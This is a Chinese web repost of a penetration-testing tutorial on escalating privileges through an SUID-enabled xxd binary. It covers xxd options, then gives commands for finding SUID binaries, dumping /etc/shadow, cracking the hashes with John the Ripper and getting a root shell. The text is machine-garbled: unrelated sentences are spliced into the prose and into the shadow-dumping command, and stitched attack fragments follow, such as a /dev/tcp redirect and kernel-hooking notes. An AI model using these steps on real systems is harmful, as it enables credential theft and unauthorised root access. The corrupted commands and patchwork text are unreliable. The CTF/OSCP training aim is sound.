黑客进犯代码:怎么经过Linux xxd指令进行提权

访客5年前黑客资讯526

本文将为我们介绍另一个可用于提权的Linux指令,即“xxd”。xxd指令的作用是将给定的规范输入或许文件,做一次十六进制的输出,反之它也可以将十六进制的输出转化为本来的二进制格局。

注:发布“Linux for Pentester”系列文章的首要意图,是为了向浸透检验人员介绍有关在处理CTF应战或根据Linux提权的OSCP labs时或许遇到的状况和问题。而不是为了在这儿对任何 *** 或系统管理员,供应程序/文件等高权限的过错配备行为进行批评。

xxd 介绍

我们知道假设想要将某个文件转化成另一种格局,我们可以通过运用一些在线的转化东西,它可以协助我们将一个文件转化成简直任何我们所需的文件格局,例如:“pdf to word,jpg to每个模块都有额外的参数可以定制,假设运转了“help”,你可以看到或许设置任何附加选项。 pdf,excel to pdf“等等。但假设有人想要将恣意文件转化为十六进制或二进制 *** ,那又该怎么办呢?

其实这很简单,在Linux上我们可以通过xxd这个指令来做到这一点。xxd指令可以为给定的规范输入或许文件做一次十六进制的输出,它也可以将十六进制输出转化为本来的二进制格局。这也有助于对恣意文件的编码和解码。

首要,让我们运用help/man指令,查看xxd指令的详细运用 *** 。

xxd -h
运用 xxd 履行的首要操作

将文件内容转化为十六进制:例如,我创立了一个名为“secret.txt”的新文件,现在我想将其内容都转化为十六进制 *** ,我可以通过键入以下指令履行:

Syntax: xxd <options> filename

xxd secret.txt

如下图所示,很明显xxd现已为文件“secret.txt”生成了十六进制转储。

在这儿我们可以观察到,以下十六进制转储取得了它的默许格局,例如:

索引行数(例如:00000000, 00000010, 00000020…………00000220)

每组的默许八位字节数为2(-e: 4 little-endian hexdump),其分组巨细为4字节(例如:4967 6e69…………6e67)

规范列长度为16位,带有空格

运用xxd越过第n行:在转化文件时,有许多数据或许是我们不需要的。因此,我们可以越过这些内容(越过行数)。我们可以运用xxd越过第n行,并在越过的行后生成十六进制值。

假设在我当时的状况下,我想要从第5行生成十六进制转储,那么可以通过运用& ldquo;-s”参数后跟xxd指令来完结。

xxd -s 0x50 secret.txt

将输出约束为特定长度:以上我现已解说了怎么通过越过行数(即从特定行输出)来检索数据。可是,假设你想要约束规范输出的长度,那么你可以运用“-l”参数。

这儿,我约束了我的内容长度,以将数据打印到有限的规模,即第5行,如下图所示。

xxd -l 0x50 secret.txt

因此,我们可以观察到两个指令之间的差异;之一个指令生成从第6行初始化的十六进制值,第二个指令根据十六进制索引以第5行完毕,请参阅以上截图。

将文件内容转化为二进制文件:假设你想将文件转化为二进制 *** ,则可以运用“-b”选项。指令如下:

xxd -b secret.txt

设置列长:上面我现已介绍了怎么越过并约束输出到规模,其实我们还可以设置列的长度。默许状况下,关于任何转储文件它都是12, 16。

默许值:我们知道默许列长度为16。这将打印16个字符,包含空格。

xxd -l 0x20 secret.txt

将列长度设置为32:我运用“-l”选项设置了完毕索引以约束打印数据的规模。然后我运用“-c”参数,将列的长度设为了32。

xxd -l 0x40 -c 32 secret.txt

从下图中,我们可以知道xxd是怎么约束列长度的。

将列长度设置为9:现在我们将列长度设置为“9”。

xxd -l 0x40 -c 9 secret.txt

在全部这些状况下,xxd都是通过空格计数每个字符来为文件创立十六进制转储的。

纯16进制转储:我们可以运用“-ps”选项,以 postscript的接连16进制转储输出。这儿我们将其输出保存在hex文件中,以获取secret.txt文件的纯16进制转储。为了验证成果,我们运用cat指令从hex文件中读取输出。

xxd -ps secret.txt > hexcat hex

从下图中,我们可以知道xxd是怎么为“secret.txt”文件,创立纯十六进制转储的。

复原文件:我们可以运用“-r”选项,来复原转化的文件内容。在我们的比如中,我运用了“-r -p”将纯十六进制转储的反向输出打印为了ASCII格局。

xxd -r -p hex

分组巨细字节:假设我们需要将输出分组为多个八位字节,那么我们可以运用“-g”选项来完结。默许状况下为2(-e: 4 little-endian hex dump)。因此,假设我们将值设为4,那么它将被分组为8位。

鄙人图中我们将值设为8,它将分组为16位作为输出以简化成果。

xxd -l 0x30 -g 8 secret.txt
SUID Lab 设置

SUID特别权限是以指令(可履行文件)的全部者权限来运转这一指令的,而不是以履行者的权限来运转该指令。现在,让我们在xxd上启用SUID权限,这样本地用户就有机遇运用xxd来获取root权限。

键入以下指令,启用SUID位:

which xxdchmod u+s /usr/bin/xxdls -al /usr/bin/xxd
SUID 运用

现在,我们将通过特别权限位SUID来运用xxd服务。为此,我创立了一个受害者机器的会话,这将答应我们运用方针系统的本地用户访问。

让我们运用ssh连接到方针机器,指令如下:

ssh test@192.168.1.103

成功访问受害者机器后,我们运用find指令来查找具有SUID权限的二进制文件。

find / -perm -u=s -type f 2>/dev/null

这儿我们可以看到有许多二进制文件具有SUID位,但我们关键注重/usr/bin/xxd。

在xxd上取得特别权限位SUID,我们将获取用于提取暗码哈希文件的shadow文件。

如下图所示,我已央求通过运用xxd露出/etc/shadow文件,它将为该文件生成十六进制转储,并通过管道传输xxd指令来康复其输出。 

xxd "勒索侵犯途径一般是黑客通过RDP侵犯后人工投毒的,通过选择6月13号的RDP日志,发现了一个6点48分的可疑RDP联接记载,联接源IP是192.168.0.218,这是个内网地址,开端怀疑黑客是先侵犯了该主机,然后以该主机为跳板侵犯数据库服务器的。/etc/shadow" | xxd -r

现在,我将运用john the ripper这款东西来破解哈希暗码。这样我们就可以获取用户凭证,如下图所示。

john hash

获取凭证后,我们就可以切换用户了。首要,我们来查看下用户的sudo权限:raj,发现用户“raj”具有全部权限。

su rajsudo -lsudo su

因此,让我们直接切换到root用户帐户,并访问root shell(如下图所示)。至此,我们已成功运用xxd指令提升了我们的用户权限。

*参阅来历:hackingarticles,FB小编secist编译,转载请注明来自FreeBuf.COM

黑客进犯代码:怎么经过Linux xxd指令进行提权

因此,在了解了section的定义后,就彻底可以了解为什么在加载库时NtOpenSection是榜首个被调用的内核函数。import win32con如何通过Linux xxd命令进行提权

黑客攻击代码& /dev/tcp/ip/port:将stdout/stderr重定向到与ip:port的tcp套接字中在这两位研究员看来,虽然完结侵犯需求必定的难度,可是他们信赖必定有一部分人也现已掌握了这种侵犯 *** ,并且伺机而动。当然,关于普通用户来说,用冷发起侵犯有点杀鸡用牛刀的意思,因此他们以为,大型企业,例如银行之类的,或许是被关键注重的方针。-M:递归扫描提取的文件

失利的审理安全登录检验,例如用户妄图访问 *** 驱动器失利,则该检验会被作为失利审理工作记载下来。考虑到企业SOC的本钱很简单抵达300万到500万美元,Raim指出,一些客户首要专注于”find and forget(发现并遗忘)“处理计划,因为它们的价格实惠得多。一个处理服务可以为客户供应EDR功用,包含分析师输入( *** yst input),减少客户对内部专业知识的需求。这些类型的服务或许会在可猜想的12、24或36个月的合同中推出,或许本钱或许会根据组织的架构和基础设施需求而不坚定。本地包含缝隙:find pentestlab -exec whoami ;黑客攻击代码

0x03逆向分析export HISTTIMEFORMAT=”%F %Twho -u am i 2>/dev/null| awk '{print $NF}'|sed -e 's/[()]//g'whoami ”,留心空格都是有必要的。

} struct _libc_fpstate __fpregs_mem;********** vuln();如何通过Linux xxd命令进行提权

黑客攻击代码$FilesToBlock = $Files | Where-Object {为了发起系统调用挂钩功用,我举荐增加可加载模块的支撑,由/dev/kmem接口支撑,一同导出全局内核符号表。不要忘了禁用内存保护。这些选项的值在配备文件中现已存在,只需求简略的设置以下值。Payload size: 193 bytes

上述模型描写了一次内部欺诈全部必要具有的三个元素,即压力(动机)、机遇(才干)以及合理化(心情)。下面我们分别进行分析。

黑客攻击代码

小明都是某出名外交网站XX的用户,XX出于安全考虑在登陆的当地用了非对称加密。小明在登陆界面敲入账号、暗码,点击“登陆”。所以,阅读器运用公钥对小明的账号暗码进行了加密,并向XX发送登陆央求。XX的登陆授权程序通过私钥,将账号、暗码解密,并验证通过。之后,将小明的个人信息(含隐私),通过私钥加密后,传输回阅读器。阅读器通过公钥解密数据,并展示给小明。

3 、WinNT/Pitou开发者调整的Leo Davidson *** ,可以在Windows 7到Windows 10.210532之间全部系统上作业;#include "Windows.h"fgrep - R "Runtime"*.log >log.txt如何通过Linux xxd命令进行提权

可是CCC官方标明,苹果公司所责怪的活络视频在media.ccc.de.彻底可以正常观看,在苹果TV的YouTube程序上也可以正常观看。}84248BC0AC1F2F42A41CFFFA70B21B347DDC70E9终究,我们可以在iSpy里设置我们的手机号,这样当我们的监控系统检测到一些动态时,iSpy会发短信提示我们。当然短信也可以换成是发送一封邮件或许一条微博。 s.close()
本文标题:黑客进犯代码:怎么经过Linux xxd指令进行提权

相关文章

如何预防黑客入侵手机

不去惹人家自然不会惹你 刷机初始化,入侵了自己的手机那很多信息都会被盗取了,不要使用手机支付。 你好;你可以安装一个腾讯手机管家进行防护,它是一款免费的手机杀毒和手机管理软件,拥有的功能很全面,它可以...

实时监控对方手机位置的软件(监视对方位置的软件)

实时监控对方手机位置的软件(监视对方位置的软件)

老公的手机定位在哪里? 1、如果你想悄悄查对方的位置,可以使用华为手机自带的安全助手应用。在该应用中选择位置共享选项,然后选择对方共享位置。2、用自己手机查老公的位置的方法有:电脑定位、手机号码定位、...

盗版游戏是黑客软件吗(盗版游戏是哪个游戏)

盗版游戏是黑客软件吗(盗版游戏是哪个游戏)

盗版和正版游戏软件有什么不同 购买方式不同:Steam正版游戏需要在Steam平台上购买,而破解版游戏则是通过非法手段获得。价格不同:Steam平台上的正版游戏需要付费购买,而破解版游戏则是免费获取。...

微软在Bing中删除了虚假的谷歌Chrome广告_广告

微软移除必应中的虚假谷歌Chrome广告,即日,一位推特用户爆料称,微软必应搜索引擎包括歹意广告,并倾销冒充googleChrome网站。在微软删除这些广告以前,少许用户曾经看到了这些广告。 1.凭...

读老人与海有感(读《老人与海》有感600字)

读老人与海有感(读《老人与海》有感600字) 这个假期重新读了一遍海明威的《老人与海》,感触颇多。 我最喜欢这本书上的片段是:老人走到门外,男孩跟着他。男孩很困,老人用胳膊搭着他的双肩说:“真抱歉...

途牛满血复活?

配图图片来源于Canva可画 2020年一场肺炎疫情让旅游服务业遭受很大的严厉打击,在线旅游平台服务平台当然第一个。虽然新冠肺炎疫情在全世界仍有扩散之势,但在中国早已保持稳定,度假旅游从业人员们遭受...